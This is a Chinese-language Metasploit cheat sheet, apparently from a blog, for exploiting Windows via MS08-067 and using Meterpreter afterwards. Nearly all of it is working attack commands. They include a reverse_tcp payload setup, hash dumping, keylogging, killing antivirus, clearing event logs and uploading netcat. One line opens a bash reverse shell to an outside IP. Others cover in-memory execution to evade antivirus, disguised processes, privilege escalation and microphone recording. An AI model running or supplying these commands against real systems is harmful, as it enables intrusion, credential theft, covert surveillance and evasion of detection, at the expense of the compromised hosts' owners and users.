meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。
基本命令
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.80.148
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.80.163
msf exploit(ms08_067_netapi) > exploit -j
msf exploit(ms08_067_netapi) > sessions -i 1 进入meterpreter类型的shell
meterpreter > background 退出到msf命令提示符下
meterpreter > lpwd 等价于在kali上输入pwd
meterpreter > lcd /etc 等价于在kali上输入cd /etc
meterpreter > run post/windows/gather/smart_hashdump 获取目标主机上用户的hash值
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
meterpreter > run killav 结束目标主机上的杀毒软件相关进程
meterpreter > clearev 清除系统日志
meterpreter > download boot.ini 下载目标主机上的boot.ini文件
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 上传nc.exe到目标主机上。(注意要使用2个反斜杠)
meterpreter > dir windows\\system32\\nc.exe
meterpreter > execute -f nc -nvlp 3333 执行nc.exe
meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"
meterpreter > execute -f bash -i -H
meterpreter > execute -f cmd.exe -i -H 获得目标主机的shell,-i交互模式,-H隐藏
meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"
meterpreter > cat foo.txt
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
meterpreter > getuid 查看当前用户
meterpreter > getsystem 提权到system用户
meterpreter > getprivs 查看当前用户具有的权限
meterpreter > getpid 查看meterpreter注入到了什么进程中
meterpreter > migrate 1436 更改到pid1436进程中
meterpreter > getpid 重新使用getpid命令查看
meterpreter > hashdump 获取目标主机上用户的hash值
meterpreter > sysinfo 查看目标系统的信息
meterpreter > kill 188 结束188进程
meterpreter > shell 获取目标操作系统的shell
meterpreter > idletime 查看目标主机已经空闲了多长时间
meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts 编辑hosts文件
meterpreter > record_mic -d 10 -f /root/桌面/1.mp4 监听麦克风
meterpreter > load python 加载python插件
Msfcli
Msfcli编写脚本时便于引用,一条语句获得自己需要的操作。2015年6月已经取消,被msfconsole -x取代。
msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set RHOST 192.168.80.148;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST 192.168.80.163;exploit"
网友评论